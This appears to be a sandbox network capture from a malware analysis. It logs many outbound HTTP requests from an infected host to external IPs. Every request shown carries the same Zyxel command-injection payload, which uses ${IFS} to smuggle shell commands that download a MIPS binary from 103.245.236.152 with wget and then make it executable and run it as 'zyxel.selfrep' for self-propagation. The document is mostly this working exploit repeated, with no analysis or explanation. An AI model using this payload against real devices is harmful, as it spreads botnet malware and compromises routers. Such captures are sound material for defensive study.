                                          Jan 14, 2024 15:46:07.818870068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2447192.168.2.235294283.116.237.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818883896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2448192.168.2.235967497.243.110.166443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818914890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2449192.168.2.2335602111.91.81.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818936110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2450192.168.2.234945458.117.97.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818964958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2451192.168.2.236070659.14.130.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818995953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2452192.168.2.2359990106.121.20.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819026947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2453192.168.2.2356028187.46.46.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819061995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2454192.168.2.2350014191.68.74.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819061995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2455192.168.2.2359570161.111.45.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819098949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2456192.168.2.234485480.197.153.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819114923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2457192.168.2.2340364123.113.29.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819159985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2458192.168.2.235731452.82.173.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819188118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2459192.168.2.2341470114.55.94.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819191933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2460192.168.2.2333260122.209.191.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819211006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2461192.168.2.2333636209.26.29.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819228888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2462192.168.2.2339142133.15.186.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819236040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2463192.168.2.2348824106.57.127.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819261074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2464192.168.2.2355790124.155.112.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819279909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2465192.168.2.235563243.178.93.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819295883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2466192.168.2.2358040192.52.113.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819325924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2467192.168.2.2342810217.42.131.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819328070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2468192.168.2.2345870157.195.30.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819335938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2469192.168.2.235342899.232.27.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819421053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2470192.168.2.233317673.196.26.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819421053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2471192.168.2.2350584188.65.61.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819421053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2472192.168.2.235171286.12.79.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819437981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2473192.168.2.2340456155.230.60.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819463968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2474192.168.2.234060285.180.0.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819545031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2475192.168.2.235886290.197.133.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819547892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2476192.168.2.2352938163.152.155.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819570065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2477192.168.2.235355031.55.146.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819570065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2478192.168.2.2351584188.245.4.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819571018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2479192.168.2.233676065.210.218.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819608927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2480192.168.2.236019671.83.75.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819631100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2481192.168.2.2359748160.117.89.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819674969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2482192.168.2.235388486.188.180.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819713116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2483192.168.2.234985439.202.207.23443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819721937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2484192.168.2.2348936221.241.117.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819745064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2485192.168.2.235568050.60.19.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819766998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2486192.168.2.2350252189.190.44.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819775105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2487192.168.2.2340914129.53.162.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819776058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2488192.168.2.236021050.228.157.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819776058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2489192.168.2.235964899.133.110.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819789886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2490192.168.2.2339442121.161.78.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819817066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2491192.168.2.2344462149.38.34.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819838047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2492192.168.2.235940662.136.178.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819843054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2493192.168.2.2337270216.2.144.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819850922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2494192.168.2.2342198132.247.121.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819864035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2495192.168.2.2353334155.142.30.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819947004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2496192.168.2.2343862157.140.82.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819947004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2497192.168.2.2349568209.33.58.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819987059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2498192.168.2.234528844.241.157.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819987059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2499192.168.2.235539252.241.26.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.819993973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2500192.168.2.2334398118.16.170.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820010900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2501192.168.2.233481624.93.28.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820027113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2502192.168.2.2349976111.69.71.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820055962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2503192.168.2.2343688156.171.116.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820060015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2504192.168.2.235686618.30.27.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820086956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2505192.168.2.233812423.128.31.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820122004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2506192.168.2.233346827.186.4.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820154905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2507192.168.2.235322232.133.145.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820158005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2508192.168.2.2355376115.119.12.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820197105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2509192.168.2.2345116147.128.104.66443
                                          TimestampBytes transferredDirectionData
